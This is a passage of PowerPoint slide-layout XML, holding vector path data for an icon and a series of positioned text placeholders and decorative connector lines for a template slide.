                      <a:pt x="492188" y="490119"/>
                      <a:pt x="478692" y="490119"/>
                      <a:pt x="470366" y="481786"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="462042" y="473451"/>
                      <a:pt x="462042" y="459944"/>
                      <a:pt x="470366" y="451609"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="575986" y="345877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575986" y="279255"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="550640" y="284789"/>
                      <a:pt x="523171" y="289806"/>
                      <a:pt x="504348" y="290872"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="417748" y="377564"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="409424" y="385899"/>
                      <a:pt x="395926" y="385899"/>
                      <a:pt x="387602" y="377564"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="379276" y="369231"/>
                      <a:pt x="379276" y="355724"/>
                      <a:pt x="387602" y="347389"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="447232" y="287691"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="424484" y="284496"/>
                      <a:pt x="402027" y="279032"/>
                      <a:pt x="380232" y="271384"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="380211" y="271384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346579" y="259665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273221" y="333109"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="264897" y="341444"/>
                      <a:pt x="251399" y="341444"/>
                      <a:pt x="243073" y="333109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="234749" y="324774"/>
                      <a:pt x="234749" y="311269"/>
                      <a:pt x="243073" y="302934"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="301847" y="244097"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240823" y="222840"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="209956" y="211911"/>
                      <a:pt x="178195" y="206223"/>
                      <a:pt x="146134" y="205725"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="309310" y="42684"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="301213" y="42684"/>
                      <a:pt x="293116" y="44781"/>
                      <a:pt x="285861" y="48973"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75955" y="170293"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="101016" y="165463"/>
                      <a:pt x="125525" y="163058"/>
                      <a:pt x="146290" y="163058"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146446" y="163058"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146605" y="163058"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="183367" y="163590"/>
                      <a:pt x="219750" y="170119"/>
                      <a:pt x="254984" y="182578"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="255032" y="182596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394304" y="231106"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="427804" y="242842"/>
                      <a:pt x="463036" y="248720"/>
                      <a:pt x="498232" y="248393"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="514342" y="248222"/>
                      <a:pt x="546143" y="242310"/>
                      <a:pt x="575986" y="235523"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="575986" y="216654"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="575986" y="199883"/>
                      <a:pt x="567049" y="184382"/>
                      <a:pt x="552538" y="175997"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="332760" y="48973"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="325504" y="44781"/>
                      <a:pt x="317407" y="42684"/>
                      <a:pt x="309310" y="42684"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="309309" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="324767" y="0"/>
                      <a:pt x="340225" y="4004"/>
                      <a:pt x="354077" y="12011"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="573854" y="139035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="601555" y="155050"/>
                      <a:pt x="618620" y="184640"/>
                      <a:pt x="618620" y="216654"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="618620" y="470701"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="618620" y="502731"/>
                      <a:pt x="601555" y="532321"/>
                      <a:pt x="573854" y="548320"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="354077" y="675344"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="326373" y="691358"/>
                      <a:pt x="292245" y="691358"/>
                      <a:pt x="264544" y="675344"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="44766" y="548320"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17063" y="532321"/>
                      <a:pt x="0" y="502731"/>
                      <a:pt x="0" y="470701"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="216654"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="184640"/>
                      <a:pt x="17063" y="155050"/>
                      <a:pt x="44766" y="139035"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="264544" y="12011"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="278394" y="4004"/>
                      <a:pt x="293852" y="0"/>
                      <a:pt x="309309" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grp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grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Graphic 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CCD049-3BC0-4032-9397-8F3384F49D9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3737" y="4011132"/>
              <a:ext cx="773522" cy="757735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8D668E-715C-7CAC-247A-B813DE24D96E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295648" y="2058987"/>
            <a:ext cx="2108507" cy="377026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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52" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76600991-7101-A7B5-0339-61C0390E19EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295648" y="2956096"/>
            <a:ext cx="1514749" cy="546303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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53" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBD5086-C358-AEC5-FEB0-F525AACC5ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295648" y="3942054"/>
            <a:ext cx="1514749" cy="546303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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56" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4CB8B6-3188-CDE2-0D7A-07DAE1D0E001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3308920" y="5044993"/>
            <a:ext cx="2108507" cy="377026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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59" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C3F70E-600C-1BDC-A71C-3814DAEA7AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="4938599"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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61" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D23996-31D8-9294-4318-6F7A346670AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="5210327"/>
            <a:ext cx="1297564" cy="259675"/>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64" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52983DF5-DD43-F9FB-762F-B50641A5CB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="3934206"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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65" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3361534-7071-6687-3776-451273A7B6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="4205934"/>
            <a:ext cx="1297564" cy="259675"/>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66" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59AE640-9A3E-EE74-38AF-E552397CDB33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="2952399"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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67" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F616B14D-CEE5-A161-49A8-0C610B363D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="3224127"/>
            <a:ext cx="1297564" cy="259675"/>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70" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640AEB35-1DCB-0392-6DD0-0827F417B829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="1959868"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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71" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F1740C-E687-49A8-EAFD-6ED916A99D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196371" y="2231596"/>
            <a:ext cx="1297564" cy="259675"/>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75" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF43D656-D32C-E38A-6679-4960A6A712B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050184" y="2064626"/>
            <a:ext cx="2108507" cy="377026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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77" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F5DDB2-775D-12E0-94AD-332246089215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643942" y="3947693"/>
            <a:ext cx="1514749" cy="546303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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78" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545C41BB-17FE-35FF-4574-CF9C86917139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050184" y="5050632"/>
            <a:ext cx="2108507" cy="377026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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79" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E48904B-9C75-34E0-53BD-3A1AA6A75A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643942" y="2961735"/>
            <a:ext cx="1514749" cy="546303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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96" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3BE035-C2F1-BD11-B11B-974ADEB54B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487907" y="4938599"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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97" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB96CFF8-8CE5-FFA9-46A5-98D8A313DB27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9924110" y="5210327"/>
            <a:ext cx="1297564" cy="259675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r"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98" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD41DD1-E51C-DCD4-FADE-21A7FD1D11BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487907" y="3934206"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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99" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B78BF770-2847-1907-7CC1-EB0E5FCC95F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9924110" y="4205934"/>
            <a:ext cx="1297564" cy="259675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r"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00" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F6DC1FD-3C75-C0B3-C2EB-90A41F9E9240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487907" y="2952399"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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101" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097F5C4C-5AB8-82F7-DFC1-2788582E3104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9924110" y="3224127"/>
            <a:ext cx="1297564" cy="259675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r"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02" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5931EDA5-30F2-405C-256A-3B97AC5DED33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487907" y="1959868"/>
            <a:ext cx="1733767" cy="200055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">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103" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C84B5A9-3C26-1458-DFF8-6E22BDBC4869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9924110" y="2231596"/>
            <a:ext cx="1297564" cy="259675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1405969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5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CB54FB65-39D5-783E-BE15-4D030FFFC2E7}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737403"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7862A-A193-4672-DA3C-5ACFE27882BD}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057203"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81AE87-62F6-14C0-A5D4-D1706FE67D55}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7377003"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5CE0F4-0257-4E99-542E-773C7946590D}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
